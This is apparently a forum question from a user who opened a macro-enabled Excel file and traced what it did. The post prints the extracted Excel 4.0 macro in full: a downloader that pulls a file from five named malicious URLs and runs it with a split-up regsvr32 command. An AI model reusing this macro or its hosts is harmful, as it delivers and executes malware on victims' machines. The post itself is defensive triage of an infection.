Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly.
Digged into the Excel structure, found the following (extremely obfuscated) payload:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/ofoed/ZHGzF/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/wp-content/Gzza9KkuuCa/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/portal/e6Ga3Y9/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XFRV7L84/Gtb9BR0M/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
When access, the malicious URLs contain the following contents:
- onlinebrandedcontent: Standard Apache file index page with no contents
- onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
- marcoantonioguerrerafitness/acceptanceh/gloselweb: Presumably malicious DLL file
I located enu.ocx
on my machine. Creation timestamp is correct, ~5kb file size. To my relief, the contents are identical to the onlyfansgo "Account Suspended" HTML file.
So, on the surface of it, it looks like the macro got as far as the onlyfansgo HTML file instead of the malicious DLL payload, and then presumably tried to execute it using regsvr32.exe
(which would have failed).
My question: Is it likely I dodged a bullet? And if so, why did the macro stop at the HTML file instead of continuing to the other malicious URLs (i.e. what in that urlmon
call below would have assumed the HTML file was a valid payload, but not the earlier onlinebrandedcontent Apache index HTML)?